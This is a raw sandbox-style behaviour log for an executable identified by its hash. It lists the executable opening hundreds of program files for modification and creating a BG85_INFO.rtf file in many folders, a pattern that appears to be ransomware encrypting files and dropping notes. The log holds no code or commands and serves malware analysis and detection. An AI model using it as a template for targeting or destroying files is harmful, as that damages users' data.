c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tashkent c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Matamoros c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\el.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\sound.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\gu.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3_0.12.0.v20140227-2118.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_ja.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Update\Install\{24604DAC-26A2-4023-B42D-9AEA602FC027}\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer.bat c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\psfont.properties.ja c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Brisbane c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Gambier c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\security\local_policy.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\ZoneInfoMappings c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\MANIFEST.MF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.servlet_8.1.14.v20131031.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\derby_common.bat c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-core-kit.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Vladivostok c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EET c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\launcher.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\DumontDUrville c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\NOTICE c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jsse.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Athens c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Accessibility.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cancun c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Edmonton c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\DumontDUrville c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jayapura c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Niue c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\tesselate.x3d c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunjce_provider.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Mail\WinMail.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Real.mpp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\de.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\El_Aaiun c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sampler.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Maldives c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+6 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbytools.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Qyzylorda c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Vladivostok c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Magadan c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Merida c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rainy_River c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_de.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cayenne c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\epl-v10.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Bissau c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Scoresbysund c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\et.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\COPYRIGHT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\management.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.RSA c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Sitka c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\leftnav.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.descriptorProvider.exsd c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightDemiBold.ttf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Accra c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_pt_BR.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\license.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.jetty_3.0.200.v20131021-1843.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Lindeman c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Journal\Templates\Shorthand.jtp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\ConvertFromExit.pps c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\booklist.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bogota c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\ij c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cayman c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Barbados c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\Atlantic\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Copenhagen c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\PYCC.pf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\sound.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Tunis c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Monrovia c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32Info.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\drive.crx c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Lisbon c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\dblook c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\license.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiling.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Vostok c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\core_visualvm.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-compat.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\rockbox_fm_presets.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kiritimati c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator_3.3.300.v20140518-1928.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_ja.jar 